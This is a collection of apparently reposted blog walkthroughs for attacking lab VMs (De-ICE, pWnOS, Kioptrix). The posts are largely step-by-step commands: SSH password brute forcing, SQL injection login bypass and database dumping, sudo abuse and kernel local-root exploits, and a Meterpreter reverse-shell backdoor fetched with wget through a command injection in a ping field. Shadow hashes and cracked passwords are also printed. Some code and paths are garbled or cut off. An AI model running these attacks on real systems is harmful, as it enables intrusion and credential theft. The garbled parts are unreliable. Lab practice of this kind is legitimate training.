[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin)  with '~' infront. -> http://192.168.2.101 -> 80







firefox http://192.168.2.101/~pirrip



[+]kate -> Update usernames with the ones which we got a respond from. Save.



[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2



./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124



firefox http://192.168.2.101/~pirrip/.ssh



// Save both files



mv /root/id_rsa /http://root/.ssh/id_rsa



mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub



chmod 000 /http://root/.ssh/id_rsa



chmod 000 /http://root/.ssh/id_rsa.pub



ssh pirrip@192.168.2.100

// Yes



mailx

// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'



cd /etc/



vi passwd



// kate -> Update usernames with only valid ones.



vi group



sudo vi shadow

// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st



su

// Password: 0l1v3rTw1st



cd /root/



ls -a



cd .save/



ls -a



chmod -R 777 /root/



//In BackTrack//



scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/



unzip great_expectations.zip



tar xf great_expectations.tar



strings Jan08



//In SSH//

sudo iv /var/mail/havisham



modprobe capability



//In BackTrack//

ftp 192.168.2.100

// Usrename: pirri. Password: 0l1v3rTw1st //



ls -a



//In SSH//



exit





//In BackTrack//



[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com

// GAME OVER



----------------------------------------------------------------------------------------------------

Users

root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::

havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::

magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::

----------------------------------------------------------------------------------------------------

Notes

Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you.

HOWTO : pWnOS

2011-09-11T23:51:00.002+08:00

nmap 192.168.3.1-255



nmap -sV -sS -O 192.168.3.100



firefox http://192.168.3.100



firefox http://192.168.3.100:10000





firefox -> milw0rm/explo.it -> search "Webmin" -> save. Filename: webmin.pl/php

*Webmin <> save. Filename: shadow



firefox -> milw0rm/explo.it -> search "Debian OpenSSL" -> save. Filename: ssh.py/rb

*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*

http://milw0rm.com/exploits/5622        (perl)

http://milw0rm.com/exploits/5720        (python)

http://milw0rm.com/exploits/5632        (ruby)

http://www.exploit-db.com/exploits/5622 (perl)

http://www.exploit-db.com/exploits/5720 (python)

http://www.exploit-db.com/exploits/5632 (ruby)



wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2



perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys

perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys

perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys

perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys



tar jxvf debian_ssh_rsa_2048_x86.tar.bz



cd rsa/2048



grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub

grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub

*scans for the public key...*



ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100

exit



ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100

hostname

uname -a



firefox -> milw0rm/explo.it -> search "Linux Kernel 2.6" -> save. Filename: vmsplice.c

*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*

http://milw0rm.com/exploits/5092         (c)

http://www.exploit-db.com/exploits/5092  (c)



nano vmsplice.c



gcc vmsplice.c -o vmsplice



./vmsplice



whoami



----------------------------------------------------------------------------------------------------

Users

root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::

vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::

obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::

osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::

yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

----------------------------------------------------------------------------------------------------

Notes

I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!

This is one method of getting in, the author did say that there is multiple ways in!

It took me a bit of work to also to get it to work with virtual box & static IP addresses.

That's all! See you.

HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}

2011-09-11T23:39:00.000+08:00

ifconfig eth0

ifconfig eth0 192.168.1.59

ifconfig eth0

nmap 192.168.1.* -n -sn -sP

us -H -msf -Iv 192.168.1.120 -p 1-65535 && us -H -mU -Iv 192.168.1.120 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.13.120

firefox 192.168.1.120    # Add new product -> view product

cd /pentest/database/sqlmap

./sqlmap.py -u "http://192.168.1.120/products.php?id=1" -f -b --current-user --is-dba --is-dba --privileges --dbs --dump

./sqlmap.py -u "http://192.168.1.120/products.php?id=1" --users --passwords

cd output/192.168.1.120/

ll

grep -i administrator log

grep -i localhost log | grep -v : | sort | uniq

grep -i localhost log | grep -v : | sort | uniq | sed "s/\[\*\] '//" | sed  "s/'@'localhost'//" > /tmp/users

grep "clear-text" log | sort | uniq

grep "clear-text" log | sort | uniq | sed "s/    clear-text password: //" > /tmp/passwords

wc -l /tmp/users

hydra -L /tmp/users -P /tmp/passwords -e ns 192.168.1.120 ssh 2>/dev/null | tee /tmp/output

#medusa -h 192.168.1.120 -U /tmp/users -P /tmp/passwords -O /tmp/output -e ns -M ssh

ssh ccoffee@192.168.1.120

ls

cd scripts

ls -lah

sudo -l

cat getlogs.sh

mv getlogs.sh getlogs.bkup

echo "/bin/sh" > getlogs.sh

cat getlogs.sh

chmod +x getlogs.sh

ls -l

./getlogs.sh

id

exit

sudo getlogs.sh

sudo /home/ccoffee/scripts/getlogs.sh

id

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root/

ls -lAhR /home

#cat /home/aallen/gravy.txt

cat /home/aspears/hbkae

cat /home/bbanter/notes

cat /home/cchisholm/reminders.text

cat /home/ccoffee/DONOTFORGET

#cat /home/hlovell/creepy.doc

cat /home/jalvarez/draft

cat /home/jdavenport/company_address.txt

#cat /home/jdavenport/svrc.txt

cat /home/jduff/todo.txt

#cat /home/krenfro/list

cat /home/ktso/personnel.doc

#cat /home/kwebber/list

#cat /home/lmartinez/favorite.txt

#cat /home/mnader/layout

cat /home/rpatel/schedule

Notes

- De-ICE.net v1.2a has a static IP address of 192.168.1.120. Make sure you are on the same subnet as it!
- When booting De-ICE it will randomly assign the passwords to the usernames - so it's different each time!
- Each time you start De-ICE.net v1.2a it will generate fresh SSH keys - so it's different each time!
- I made a couple of mistakes in the video (For example: /devnull) - it's worth checking the commands subsection!

That's all! See you.

HOWTO : De-ICE.net v1.2b (1.20b) {Level 1 - Disk 3 - Version B}

2011-09-11T23:29:00.001+08:00

ifconfig eth0

ifconfig eth0 192.168.1.192

ifconfig eth0

nmap 192.168.1.* -n -sn -sP

us -H -msf -Iv 192.168.1.20 -p 1-65535 && us -H -mU -Iv 192.168.1.20 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.1.20

firefox 192.168.1.20    # customerserviceadmin@nosecbank.com

nc -v 192.168.1.20 25

HELO attacker

VRFY customerserviceadmin

mail from: attacker@slax.example.net

rcpt to: customerserviceadmin

rcpt to: csadmin

quit

wc -l /pentest/passwords/wordlists/darkc0de.lst

find / -name password.lst

wc -l /opt/framework3/msf3/data/john/wordlists/password.lst

hydra -l csadmin -P /opt/framework3/msf3/data/john/wordlists/password.lst -e ns -f 192.168.1.20 ssh 2>/dev/null | tee /tmp/output

ssh csadmin@192.168.1.20   # rocker

id

cat /etc/passwd   # sysadmin, dbadmin, sdadmin, csadmin

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less    # @nosecbank.com, sdadmin (Paul, Donovin, 21 Dec 1998), csadmin (Mark, Andy)

exit

cd /pentest/passwords/cupp/

python cupp.py -i   # Paul, Donovin, 22121998, nosecbank

hydra -l sdadmin -P paul.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh sdadmin@192.168.1.20   # donovin1998

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less    # dbadmin (Fred, databaser)

exit

python cupp.py -i   # Fred, databaser, nosecbank

hydra -l dbadmin -P fred.txt -e ns -f 192.168.1.20 ssh 2>/dev/null | tee -a /tmp/output

ssh dbadmin@192.168.1.20   # databaser60

id

pwd

ls -lah

cd mailserv_download/

ls -lah

cat * | less   # sysadmin, New Custom Encryption for Passwords

umask 002

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part1 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' > /tmp/output

su csadmin   # rocker

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part2 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output

su sdadmin   # donovin1998

strings ~/mailserv_download/2010122216451.f81Ltw4R010211.part3 | cut -f2- |  sed 's/[ \t]*//' |  sed -n '/^[0-9]*\t/p' >> /tmp/output

cat /tmp/output | sort -g

cat /tmp/output | sort -g | cut -f2-

exit

exit

exit

geany deice.java

less deice.java

javac deice.java

java deice    # sysadmin - 531/{{tor/rv/A

java deice    # root - 31/Fwxw+2

ssh sysadmin@192.168.1.20   # 7531/{{tor/rv/A

id

su -    # 31/Fwxw+2

id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

pwd

exit

pwd

ls

cat Note_to_self

ls -lAhR /home

cd /home/ftp/incoming/

ls -l

openssl -h

openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"

su -c 'openssl enc -in useracc_update.csv.enc -out useracc_update.csv -d -aes-256-cbc -k "31/Fwxw+2"'   # 31/Fwxw+2

ls -l

cat useracc_update.csv

deice.java

import java.io.*;

//import java.util.Arrays;



public class deice

{

 public static void main(String[] args)

 {

    try

    {

       System.out.println("[>] De-ICE.net v1.2b (1.20b) Password Generator");



       BufferedReader in=new BufferedReader(new InputStreamReader(System.in));

       System.out.print("[?] Username: ");

       String input=in.readLine();



       int[] output=processLoop(input);

       //System.out.println("[+] Output: "+Arrays.toString(output));



       String outputASCII="";

       for(int i=0;i] Password: "+outputASCII);



    }

    catch(IOException e)

    {

       System.out.println("[-] IO Error!");

    }

 }



 /*input is username of account*/

 public static int[] processLoop(String input){

    int strL=input.length();

    int lChar=(int)input.charAt(strL-1);

    int fChar=(int)input.charAt(0);

    int[] encArr=new int[strL+2];

    encArr[0]=(int)lChar;



    for(int i=1;i<strL+1;i++) encArr[i]=(int)input.charAt(i-1);



    encArr[encArr.length-1]=(int)fChar;

    encArr=backLoop(encArr);

    encArr=loopBack(encArr);

    encArr=loopProcess(encArr);

    int j=encArr.length-1;



    for(int i=0;i<encArr.length;i++){

       if(i==j) break;

       int t=encArr[i];

       encArr[i]=encArr[j];

       encArr[j]=t;

       j--;

    }

    return encArr;

 }



 /*Note the pseudocode will be implemented with the

 root account and my account, we still need to implement it with the csadmin, sdadmin,

 and dbadmin accounts though*/

 public static int[] backLoop(int[] input){

    int ref=input.length;

    int a=input[1];

    int b=input[ref-1];

    int ch=(a+b)/2;



    for(int i=0;i<ref;i++){

       if(i%2==0) input[i]=(input[i]%ch)+(ref+i);

       else input[i]=(input[i]+ref+i);

    }

    return input;

 }



 public static int[] loopBack(int[] input){

    int ref=input.length/2;

    int[] encNew=new int[input.length+ref];

    int ch=0;



    for(int i=(ref/2);i<input.length;i++){

       encNew[i]=input[ch];

       ch++;

    }



    for(int i=0;i<encNew.length;i++){

       if(encNew[i]<=33) encNew[i]=33+(++ref*2);
       else if(encNew[i]>=126) encNew[i]=126-(--ref*2);

       else{

          if(i%2==0) encNew[i]-=(i%3);

          else encNew[i]+=(i%2);

       }

    }

    return encNew;

 }



 public static int[] loopProcess(int[] input){

    for(int i=0;i<input.length;i++){

       if(input[i]==40||input[i]==41) input[i]+=input.length;

       else if(input[i]==45) input[i]+=20+i;

    }

    return input;

 }

}

Notes

- De-ICE.net v1.2b has a static IP address of 192.168.1.20. Make sure you're on the same subnet as it!
- The wordlist used (part of the metasploit framework) to brute force csadmin, might have been updated since - You may have to use another wordlist.
- I made a couple of mistakes in the video (For example: nosec instead of nosecbank) - it's worth checking the commands subsection!

That's all! See you.

HOWTO : Kioptrix - Level 1

2011-09-11T23:12:00.000+08:00

start-network

dhclient eth0

clear



nmap 192.168.0.* -n -sn -sP

nmap 192.168.0.111 -T4 -O -sV -sS   #-sC -A -p- -v



#nmblookup -A 192.168.0.111       # Hostname

smbclient -L \\192.168.0.111 -N   # What services are available on a server

clear



msfconsole

search samba

use linux/samba/trans2open

#info

show options

set RHOST 192.168.0.111

show options

exploit

#msfcli linux/samba/trans2open RHOST=192.168.0.111 PAYLOAD=generic/shell_bind_tcp E    #PAYLOAD=linux/x86/shell_bind_tcp



id

uname -a

cat /etc/shadow

cat /etc/issue

That's all! See you.

HOWTO : Kioptrix - Level 1.1

2011-09-11T23:02:00.002+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

Time for level 2! Like before, kioptrix is another “Vulnerable-By-Design OS” (De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any means possible.

This video demonstrates how code being injected into a web page results in the machine becoming compromised. The attacker afterwards then starts exploring the system for further pieces of information.

Method

Scan network for hosts (Nmap)
Bypass login screen (MySQL Injection)
Local command execution (PHP Injection)
Upload a backdoor (PHP Meterpreter)
Gain root access (ip_append_data() local ring0 root exploit)
Game Over
Enable access to MySQL database (MySQL Injection)
Gather information (history and user credentials)

What do I need?

Kioptrix - Level 2 VM. Download here (Mirror: Part 1 MD5:CF25057866E4BEA4F05651ACC222E3AE, Part 2 MD5:1ADCE0A6AFE4EE2FADD82F9EE3878AED, Part 3 MD5:A8012648FAB73746CE4E3250E0D66291)
VMware player OR workstation. Download here
Nmap – (Can be found on BackTrack 4-R2). Download here
Metasploit – (Can be found on BackTrack 4-R2)
Internet Browser – (Firefox can be found on BackTrack 4-R2)
A Text Editor – (Kate can be found on BackTrack 4-R2)
ip_append_data() ring0 Root Exploit – (Can be found on exploit-db.com)
MySQL – (Can be found on BackTrack 4-R2)

Walk through *Due to the forums security, I'm unable to post the complete walk through*

After starting the network services and obtaining an IP address (192.168.0.33), the attacker does a quick nmap scan to show what host are currently "alive" on the network. After a target IP is known the attacker proceeds to do a more detailed scan on the target (192.168.0.202). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this shows:

* OS: Linux v2.6.x (2.6.9-30)
* Port 80 - Web Server: Apache httpd 2.0.52 (CentOS)

The attacker navigates to the web server and is presented with a login page. The attacker chooses to enter a 'standard administrator's user name'("admin") as the user name and instead of entering a valid password uses some “MySQL injection code”. This "password" will cause the original MySQL statement returning true, therefore it will login as the chosen user without the correct password being present. The vulnerable code is as follows:

* Original command
$query = "SELECT * FROM users WHERE username = '$username' AND password='$password'";

* Expected input (user: admin, Password: 5afac8d85f):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='5afac8d85f'";

* "Injected" input (user: admin, Password: ' OR 1=1 -- -):
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This works because the attacker has asked to login as "admin" and because the MySQL command is looking either for: "password" OR "1=1" to match. Because 1 will ALWAYS be 1, the statement will return true, therefore allowing the attacker to login as admin. The code at the end " -- -", comments out the rest of the query which means that the rest of the query is ignored so the attacker does not have to worry about fixing the syntax.

The attacker is then looking at the admin panel, which allows the admin to "ping" other computers attached to the network from the server location. The attacker notices that the web pages has a "php" file extension and guesses that the server supports PHP and wonders if meterpreter agent would be able to execute. The attacker creates a "php meterpreter backdoor file" and sets up a metasploit to interact with the backdoor. The attacker starts a web server which is used to host the backdoor.

The attacker now needs to transfer the backdoor onto the server allowing them to be able to gain a remote access on the system. As mentioned before the admin panel allows admins to "ping". The attacker then tries to inject in the php file to run other commands instead. The vulnerable code is as follows:

* Original command
echo shll_exec( 'ping -c 3 ' . $target );

* Expected input (ip: 192.168.0.1):
echo shll_exec( 'ping -c 3 ' . 192.168.0.1 );

* "Injected" input (ip: ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php):
echo shll_exec( 'ping -c 3 ' . ; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php );

The coded uses “shll_exec” allows to: "Execute command via shell and return the complete output as a string". The ping command is hard-coded in at the start, however because the ping command requires an IP address to be successfully executed it fails to receive therefore it also fails to execute. Instead the attacker has used ";" which allows for commands to be executed sequentially regardless of outcome (e.g. multiple commands on the same line), which means the PHP code continues to run the attackers command even though “ping” failed. The attacker has "asked" to:

* Change directory to "/***" as this is writeable for the exploited user "apache".

* Download the content of a web page (which is the backdoor), rename it to a shorter filename and change the file extension.

* Then execute the code.

The attacker checks that a session has been created in metasploit and interacts with it. The result being that the attacker now has a remote shell on the target system.

However the exploited service (PHP) is using a user that has limited access to the system and the attacker would like more (plus the objective of kioptrix is to gain access to the superuser, "root"). The attacker makes a note of the targets system's kernel version and searches for an exploit that could lead to "privilege escalation" which would allow for “deeper access” into the system. After searching for known exploits the attacker identifies an exploit that is compatible with the target's system. The attacker downloads a copy of the exploit and transfers it using the same method as the backdoor previously. After successfully compiling the exploit, the attacker runs the exploit on the target's success which results in the attacker being promoted to the "root" account. The attacker then creates a copy of the backdoor file in the "document root". The attacker then kills the remote shell. (Note: The end goal of kioptrix has been reached and everything after copying the backdoor is optional).

As the login page requires login details, which need to be stored somewhere the attacker decides to locate these pieces of information. The attacker starts by viewing the source code of the login page for clues as these details could be; hard-coded into the source, use another file to handle this function or use a database.

Once the attacker identities that the login page uses a MySQL database which contains the login details, the attacker wants to discover what else is stored in the database. As the login page relies on the database, the login page will contain a username and password in which to access it. The attacker uses a copy the login details plus as the attacker can executed commands, they use this to their advantage by command line interaction with MySQL database.

The attacker starts off viewing all the databases which are stored in MySQL, and spots the table "MySQL" which might contain some 'interesting' details! The attacker moves on to seeing what tables are in the database, which brings up a table called "users". After selecting everything in the table the attacker spots that the "root" user has the same hash (hence same password) as the user "john" (which they are currently using).

The attacker can keep using the current system to interact with the database; however allowing direct command line access from their machine would be 'easier'. So the attacker goes about reconfiguring MySQL to allow this. Currently the only allowed access is from the local machine itself(localhost/127.0.0.1), therefore no external communication is allowed (as seen by the "nmap" & "MySQL"). However as the attacker can execute commands locally it "grants all privileges" to the user "root" on the attackers IP (which still protects access from everyone else!).

After connecting via command line, the attacker sets about finding the real password for the admin panel instead of injecting to gain access. The attacker knows which database is used (via the source code of the login page), and browses the contents of the tables. The attacker finds 2 valid logins and tries them out. The first time, shows what happens if the login details are incorrect, the next login is from a "non admin" but a valid account, and the last login is the valid admin account. When the attacker was injecting it the admin account was not specified, the database would login as the first user, in which in most cases it is the admin account as it is usually the first user that is created.

The attacker can use MySQL to view files however just like before when using PHP injection because the exploited user is a limited account, it has limited access to the system however it is a different user from before, as it now is "mysql" rather than “apache”.

The attacker tests the backdoor in order to get a remote shell again. However it is easier this time as they do not have to go though the hassle of injecting again. The attacker can just execute the php backdoor, this time done by visiting it directly on the web server, which results in the php code being executed.

After gaining access and exploiting the system gain root access, the attacker scans the system for ".mysql_history", which is a file that contains previous entered commands and views the contents when using the "root" account.

Commands *Due to the forums security, I'm unable to post the complete command list.*

start-network 

dhclient eth0 

clear 



nmap 192.168.0.0/24 -n -sn -sP  

nmap 192.168.0.202 -p 1-65500 -O -sS -sV -v 



firefox http://192.168.0.202 

-> User: admin 

-> Password: ' OR 1=1 -- - 



clear 

msfpayload | grep PHP 

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.33 LPORT=8080 R > /var/www/backdoor.php.txt 

start-apache 

msfconsole 

use multi/handler 

search php 

set PAYLOAD php/meterpreter/reverse_tcp 

show options 

set LHOST 0.0.0.0 

set LPORT 8080 

show options 

exploit -j -z  

* kate -> /var/www/backdoor.php.txt. Remove "#". Save. 

; ** /*** && **** -O bd.php 192.168.0.33/backdoor.php.txt && php -f bd.php 

sessions -l -v  

sessions -i 1 

sysinfo 

shell 

uname -a; cat /etc/*-release; id; w 



Firefox: Search (exploit.db): Linux Kernel 2.6 -> Download #http://www.exploit-db.com/exploits/9542/ 

cp 9542.c /var/www/escpriv.c 

* cd /tmp

* wget 192.168.0.33/escpriv.c 

* gcc escpriv.c -o rootMe 

* id 

* ./rootMe 

* id 

* whoami && cat /etc/issue 



* cp bd.php /var/www/html/backdoor.php    # root only on folder! 

^C 

y   #n = interact 0 && background 



firefox http://192.168.0.202 

; cat index.php 

-> Right click -> View Source. 

--> User: john 

--> Passowrd: hiroshima 

--> Database: webapp 

; mysql -u john -phiroshima -e "SHOW databases;" 

; mysql -u john -phiroshima -e "USE mysql; SHOW tables;" 

; mysql -u john -phiroshima -e "USE mysql; SELECT * FROM user;" 

mysql -h 192.168.0.202 -u root 

nmap 192.168.0.202 -sV -p 3306 

; mysql -u root -phiroshima -e "USE mysql; GRANT ALL PRIVILEGES ON *.*  TO 'root'@'192.168.0.33';"   #-D mysql #IDENTIFIED BY 'g0tmi1k';" 

nmap 192.168.0.202 -sV -p 3306 

mysql -h 192.168.0.202 -u root 

SHOW databases; 

USE webapp; SHOW tables; 

SELECT * FROM users; 

#* firefox http://192.168.0.202/ 

#-->Login *fail*, john, admin 

SELECT load_file('/etc/passwd'); 

exit 



firefox http://192.168.0.202/backdoor.php 

sessions -i 2 

shell 

*UNABLE TO POST THIS LINE OF CODE. SEE BLOG POST*

* ** /***; ./rootMe 

* cat /root/.mysql_history 

* cat /etc/shadow 



* whoami && cat /etc/issue 





#---------------------------------------------------------------------  

MySQL->history: root:Ha56!blaKAbl [???] 

MySQL->users:   root:hiroshima    [hash: 5a6914ba69e02807] 

MySQL->users:   john:hiroshima    [hash: 5a6914ba69e02807] 

MySQL->WebApp:  admin:5afac8d85f  [Type: Admin] 

MySQL->WebApp;  john:66lajGGbla   [Type: Non-admin] 

Shadow:         root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7::: 

Shadow:         john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7::: 

Shadow:         harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7::: 

#---------------------------------------------------------------------

Notes

- When meterpreter is being hosted on the attacker's system, the file extension is “.txt”, therefore it does not get executed like a php file would when called from wget on the targets system.
- The “document root” folder is only writeable by “root”.
* The attacker did not have to kill the remote shell and could have been executed in it, however this method demonstrates if the backdoor failed to work or if the attacker did not wish to use one for whatever
reason)
- When connecting to MySQL remotely, a password is not required because when executing the "GRANT ALL PRIVILEGES" statement it did not include "IDENTIFIED BY 'g0tmi1k'" after the IP address. This would set the password to "g0tmi1k".

That's all! See you!

HOWTO : Kioptrix - Level 1.2

2011-09-11T22:42:00.001+08:00

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

Brief Overview

It's time for round 3 with Kioptrix's "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.

The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.

Method

Scanned network for the host (nmap)
Added IP address to the host file
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Discovered usernames via a 'Local File Inclusion' vulnerability (Firefox)
Enumerated database (manual MySQL injection)
Reused credentials granting a remote shell
Poorly configured setting to escape privileges (Unprotected limited root access)
Uploaded and used a web backdoor (Meterpreter)
Automated MySQL Injection (SQLMap)
Alternative method to gain root as well as escaping privileges (Cron Job)

What do I need?

Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
SQLMap – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).

Walkthrough

The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.

Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).

Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).

The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local/Remote File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".

One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.

After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".

When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.

The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".

A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.

After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.

With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...

Game over

Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.

By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.

(Editor's note: This stage isn't "needed", it was only done to show how automated tools simplify the whole process!)

The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.

After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isn't able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able switch users. But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.

